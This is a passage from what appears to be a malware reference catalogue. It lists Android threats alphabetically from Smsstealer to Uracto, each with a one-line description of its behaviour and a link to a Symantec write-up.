<h3 id="_smsstealer"><a class="anchor" href="#_smsstealer"></a><a class="link" href="#_smsstealer">Smsstealer</a></h3>
<div class="paragraph">
<p>Smsstealer is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 345. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-121514-0214-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-121514-0214-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smstibook"><a class="anchor" href="#_smstibook"></a><a class="link" href="#_smstibook">Smstibook</a></h3>
<div class="paragraph">
<p>Smstibook is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 346. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-051207-4833-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-051207-4833-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smszombie"><a class="anchor" href="#_smszombie"></a><a class="link" href="#_smszombie">Smszombie</a></h3>
<div class="paragraph">
<p>Smszombie is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 347. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-082011-0922-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-082011-0922-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snadapps"><a class="anchor" href="#_snadapps"></a><a class="link" href="#_snadapps">Snadapps</a></h3>
<div class="paragraph">
<p>Snadapps is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 348. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-071807-3111-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-071807-3111-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sockbot"><a class="anchor" href="#_sockbot"></a><a class="link" href="#_sockbot">Sockbot</a></h3>
<div class="paragraph">
<p>Sockbot is a Trojan horse for Android devices that creates a SOCKS proxy on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 349. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2017-101314-1353-99">https://www.symantec.com/security_response/writeup.jsp?docid=2017-101314-1353-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sockrat"><a class="anchor" href="#_sockrat"></a><a class="link" href="#_sockrat">Sockrat</a></h3>
<div class="paragraph">
<p>Sockrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 350. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-110509-4646-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-110509-4646-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sofacy"><a class="anchor" href="#_sofacy"></a><a class="link" href="#_sofacy">Sofacy</a></h3>
<div class="paragraph">
<p>Sofacy is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 351. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2017-010508-5201-99">https://www.symantec.com/security_response/writeup.jsp?docid=2017-010508-5201-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sosceo"><a class="anchor" href="#_sosceo"></a><a class="link" href="#_sosceo">Sosceo</a></h3>
<div class="paragraph">
<p>Sosceo is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 352. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040408-0609-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040408-0609-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spitmo"><a class="anchor" href="#_spitmo"></a><a class="link" href="#_spitmo">Spitmo</a></h3>
<div class="paragraph">
<p>Spitmo is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 353. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-091407-1435-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-091407-1435-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spitmo_b"><a class="anchor" href="#_spitmo_b"></a><a class="link" href="#_spitmo_b">Spitmo.B</a></h3>
<div class="paragraph">
<p>Spitmo.B is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 354. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-0445-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-0445-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spyagent"><a class="anchor" href="#_spyagent"></a><a class="link" href="#_spyagent">Spyagent</a></h3>
<div class="paragraph">
<p>Spyagent is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 355. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-090710-1836-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-090710-1836-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spybubble"><a class="anchor" href="#_spybubble"></a><a class="link" href="#_spybubble">Spybubble</a></h3>
<div class="paragraph">
<p>Spybubble is a Spyware application for Android devices that logs the device&#8217;s activity and sends it to a predetermined website.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 356. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-121917-0335-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-121917-0335-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spydafon"><a class="anchor" href="#_spydafon"></a><a class="link" href="#_spydafon">Spydafon</a></h3>
<div class="paragraph">
<p>Spydafon is a Potentially Unwanted Application for Android devices that monitors the affected device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 357. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030722-4740-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030722-4740-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spymple"><a class="anchor" href="#_spymple"></a><a class="link" href="#_spymple">Spymple</a></h3>
<div class="paragraph">
<p>Spymple is a spyware application for Android devices that allows the device it is installed on to be monitored.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 358. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-5403-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-5403-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spyoo"><a class="anchor" href="#_spyoo"></a><a class="link" href="#_spyoo">Spyoo</a></h3>
<div class="paragraph">
<p>Spyoo is a spyware program for Android devices that records and sends certain information to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 359. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-081709-0457-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-081709-0457-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spytekcell"><a class="anchor" href="#_spytekcell"></a><a class="link" href="#_spytekcell">Spytekcell</a></h3>
<div class="paragraph">
<p>Spytekcell is a spyware program for Android devices that monitors and sends certain information to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 360. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-121021-0730-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-121021-0730-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spytrack"><a class="anchor" href="#_spytrack"></a><a class="link" href="#_spytrack">Spytrack</a></h3>
<div class="paragraph">
<p>Spytrack is a spyware program for Android devices that periodically sends certain information to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 361. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080109-5710-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080109-5710-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spywaller"><a class="anchor" href="#_spywaller"></a><a class="link" href="#_spywaller">Spywaller</a></h3>
<div class="paragraph">
<p>Spywaller is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 362. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-121807-0203-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-121807-0203-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stealthgenie"><a class="anchor" href="#_stealthgenie"></a><a class="link" href="#_stealthgenie">Stealthgenie</a></h3>
<div class="paragraph">
<p>Stealthgenie is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 363. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-111416-1306-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-111416-1306-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_steek"><a class="anchor" href="#_steek"></a><a class="link" href="#_steek">Steek</a></h3>
<div class="paragraph">
<p>Steek is a potentially unwanted application that is placed on a download website for Android applications and disguised as popular applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 364. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-010911-3142-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-010911-3142-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stels"><a class="anchor" href="#_stels"></a><a class="link" href="#_stels">Stels</a></h3>
<div class="paragraph">
<p>Stels is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 365. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-032910-0254-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-032910-0254-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stiniter"><a class="anchor" href="#_stiniter"></a><a class="link" href="#_stiniter">Stiniter</a></h3>
<div class="paragraph">
<p>Stiniter is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 366. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-030903-5228-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-030903-5228-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sumzand"><a class="anchor" href="#_sumzand"></a><a class="link" href="#_sumzand">Sumzand</a></h3>
<div class="paragraph">
<p>Sumzand is a Trojan horse for Android devices that steals information and sends it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 367. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080308-2851-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080308-2851-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sysecsms"><a class="anchor" href="#_sysecsms"></a><a class="link" href="#_sysecsms">Sysecsms</a></h3>
<div class="paragraph">
<p>Sysecsms is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 368. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-122714-5228-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-122714-5228-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tanci"><a class="anchor" href="#_tanci"></a><a class="link" href="#_tanci">Tanci</a></h3>
<div class="paragraph">
<p>Tanci is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 369. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4108-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4108-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tapjoy"><a class="anchor" href="#_tapjoy"></a><a class="link" href="#_tapjoy">Tapjoy</a></h3>
<div class="paragraph">
<p>Tapjoy is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 370. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-4702-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-4702-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tapsnake"><a class="anchor" href="#_tapsnake"></a><a class="link" href="#_tapsnake">Tapsnake</a></h3>
<div class="paragraph">
<p>Tapsnake is a Trojan horse for Android phones that is embedded into a game. It tracks the phone&#8217;s location and posts it to a remote web service.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 371. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2010-081214-2657-99">https://www.symantec.com/security_response/writeup.jsp?docid=2010-081214-2657-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tascudap"><a class="anchor" href="#_tascudap"></a><a class="link" href="#_tascudap">Tascudap</a></h3>
<div class="paragraph">
<p>Tascudap is a Trojan horse for Android devices that uses the compromised device in denial of service attacks.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 372. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-121312-4547-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-121312-4547-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teelog"><a class="anchor" href="#_teelog"></a><a class="link" href="#_teelog">Teelog</a></h3>
<div class="paragraph">
<p>Teelog is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 373. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-040215-2736-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-040215-2736-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_temai"><a class="anchor" href="#_temai"></a><a class="link" href="#_temai">Temai</a></h3>
<div class="paragraph">
<p>Temai is a Trojan horse for Android applications that opens a back door and downloads malicious files onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 374. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-091722-4052-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-091722-4052-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tetus"><a class="anchor" href="#_tetus"></a><a class="link" href="#_tetus">Tetus</a></h3>
<div class="paragraph">
<p>Tetus is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 375. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-012409-4705-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-012409-4705-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tgpush"><a class="anchor" href="#_tgpush"></a><a class="link" href="#_tgpush">Tgpush</a></h3>
<div class="paragraph">
<p>Tgpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 376. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032816-0259-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032816-0259-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tigerbot"><a class="anchor" href="#_tigerbot"></a><a class="link" href="#_tigerbot">Tigerbot</a></h3>
<div class="paragraph">
<p>Tigerbot is a Trojan horse for Android devices that opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 377. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-041010-2221-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-041010-2221-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tonclank"><a class="anchor" href="#_tonclank"></a><a class="link" href="#_tonclank">Tonclank</a></h3>
<div class="paragraph">
<p>Tonclank is a Trojan horse that steals information and may open a back door on Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 378. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trogle"><a class="anchor" href="#_trogle"></a><a class="link" href="#_trogle">Trogle</a></h3>
<div class="paragraph">
<p>Trogle is a worm for Android devices that may steal information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 379. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-081213-5553-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-081213-5553-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_twikabot"><a class="anchor" href="#_twikabot"></a><a class="link" href="#_twikabot">Twikabot</a></h3>
<div class="paragraph">
<p>Twikabot is a Trojan horse for Android devices that attempts to steal information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 380. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062614-5813-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062614-5813-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uapush"><a class="anchor" href="#_uapush"></a><a class="link" href="#_uapush">Uapush</a></h3>
<div class="paragraph">
<p>Uapush is a Trojan horse for Android devices that steals information from the compromised device. It may also display advertisements and send SMS messages from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 381. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-040114-2910-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-040114-2910-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_umeng"><a class="anchor" href="#_umeng"></a><a class="link" href="#_umeng">Umeng</a></h3>
<div class="paragraph">
<p>Umeng is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 382. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5749-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5749-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_updtbot"><a class="anchor" href="#_updtbot"></a><a class="link" href="#_updtbot">Updtbot</a></h3>
<div class="paragraph">
<p>Updtbot is a Trojan horse for Android devices that may arrive through SMS messages. It may then open a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 383. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-041611-4136-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-041611-4136-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_upush"><a class="anchor" href="#_upush"></a><a class="link" href="#_upush">Upush</a></h3>
<div class="paragraph">
<p>Upush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 384. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-0733-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-0733-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uracto"><a class="anchor" href="#_uracto"></a><a class="link" href="#_uracto">Uracto</a></h3>
<div class="paragraph">
<p>Uracto is a Trojan horse for Android devices that steals personal information and sends spam SMS messages to contacts found on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 385. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
